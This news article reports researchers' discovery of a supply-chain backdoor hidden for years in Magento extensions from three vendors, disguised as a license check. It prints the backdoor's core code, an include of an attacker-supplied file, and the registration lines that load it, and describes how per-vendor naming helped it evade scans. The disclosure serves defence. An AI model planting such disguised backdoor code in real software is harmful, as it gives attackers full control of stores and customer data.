A backdoor hidden in popular Magento extensions has quietly exposed hundreds of ecommerce stores—including a $40 billion multinational—to potential full takeover, thanks to a sophisticated supply chain attack that went undetected for years.
Security researchers at Sansec have uncovered that packages distributed by well-known Magento extension vendors—Tigren, Meetanshi, and Magesolution (MGS)—were compromised at the source level between 2019 and 2022. The attackers managed to breach the vendors’ download servers, injecting a remote execution backdoor disguised as a license check into multiple Magento modules.
At the heart of the attack is a deceptively simple adminLoadLicense function found in License.php or LicenseApi.php. This function executes an attacker-supplied PHP file with full privileges:
protected function adminLoadLicense($licenseFile)
{
$data = include_once($licenseFile);
}
This is triggered via a companion adminUploadLicense function, which in earlier versions required no authentication at all. In later variants, a hardcoded SECURE_KEY and SIGN_KEY gate the upload, but with keys embedded in the source, those are hardly a barrier for attackers who’ve already compromised the distribution.
The backdoor is quietly activated from each module’s registration.php file—triggering the fake license check on load:
if (file_exists(__DIR__ . '/Model/System/Config/Source/Box/License/License.php')) {
include_once(__DIR__ . '/Model/System/Config/Source/Box/License/License.php');
}
While the implementation is shared across modules, the filenames, authorization keys, and backdoor paths are customized per vendor. That’s deliberate obfuscation, allowing the attack to remain invisible to generic scans and inconsistent enough to avoid raising suspicion during audits.
Affected modules include some of the most commonly installed ecommerce features—wishlist managers, currency switchers, blog modules, GDPR compliance tools, and even Facebook chat integrations. These aren’t obscure extensions; they’re widely deployed across Magento stores worldwide.
Sansec notes the earliest known active abuse occurred on April 20, 2024, though the malware had been quietly present in extension packages since at least 2019. This long dormancy is unusual for supply chain compromises, which typically result in immediate exploitation. The delayed activation raises concerns that the operators were waiting for a strategic moment or using the access selectively to avoid detection.
Security recommendations are clear: scan your Magento installation immediately. Sansec’s eComscan detects the malware, and stores can remove the malicious License.php files to disable the backdoor. However, any installation from the affected vendors should be treated with caution.
Disturbingly, vendors have responded poorly. Magesolution has not acknowledged the breach and still distributes compromised packages. Tigren denies being hacked, yet infected extensions remain publicly available. Meetanshi confirmed a server compromise but insists its software was not modified, a claim the evidence contradicts.
With attackers leveraging trusted update channels, this breach highlights just how vulnerable ecommerce platforms remain to supply chain risks. For store operators, the trust in third-party modules—particularly from popular vendors—has become a liability unless reinforced with rigorous, continuous integrity checks.
Sansec continues to investigate and encourages merchants to share any original source ZIPs for further analysis. The full details, including secure keys and affected package names, are available on Sansec’s site.